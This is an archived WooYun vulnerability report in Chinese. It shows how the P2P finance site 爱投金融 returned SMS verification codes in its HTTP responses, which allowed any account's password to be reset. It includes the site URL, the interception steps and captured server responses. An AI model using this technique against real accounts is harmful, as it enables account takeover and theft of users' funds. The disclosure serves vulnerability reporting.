当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190497

漏洞标题:p2p金融安全之爱投金融任意重置帐号

相关厂商:爱投金融

漏洞作者: 路人甲

提交时间:2016-03-30 12:11

修复时间:2016-05-14 12:20

公开时间:2016-05-14 12:20

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

爱投金融,成立于2011年,是一家极具创新性的互联网投融资平台,由上海财经大学多位博士和硕士创立,并聘请知名教授作顾问指导。我们从金融交易扁平化、电子化、中国全面金融发展(包含正规金融体系和民间金融),以及解决小微企业融资难题的角度来理解认识互联网融资这一新生事物,认为它代表了一种趋势,有助于推动金融市场和实体经济和谐健康发展,是小微企业融资的有效途径,发展空间巨大。
互联网融资是个人、企业及其他组织通过现代互联网技术进行的直接融资活动,是合法民事主体间融资活动的网络化。类似于货物销售从现场交易到网络交易的转变,互联网融资实现了投融资主体间资金交易线上化,提高了成交效率,降低了交易成本,促进了社会闲置资金的快速合理配置,是新型互联网技术改变人类生活方式的具体应用之一,具有广阔的发展前景。

详细说明:

首先你需要一枚18888888888的帐号

https://www.5aitou.com/register.htm

然后获取验证码抓包

1.png


返回包中可以看到验证码

HTTP/1.1 200 OK
Date: Tue, 29 Mar 2016 11:27:00 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
6b
{"verifyCode":"7919","phoneNumber":"18888888888","phoneVerifyCode":"522319","sendType":"1","msg":"success"}
0


验证码522319

1.png


注册成功,通过以上可以得知,获取手机号码之后抓包看返回包可以知道验证码,那就去试试找回密码

1.png


HTTP/1.1 200 OK
Date: Tue, 29 Mar 2016 11:29:58 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
6b
{"verifyCode":"6549","phoneNumber":"18888888888","phoneVerifyCode":"759411","sendType":"2","msg":"success"}
0

验证码759411

1.png


帐号1888888888
密码wooyun

漏洞证明:

1.png

修复方案:

藏起来吧~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)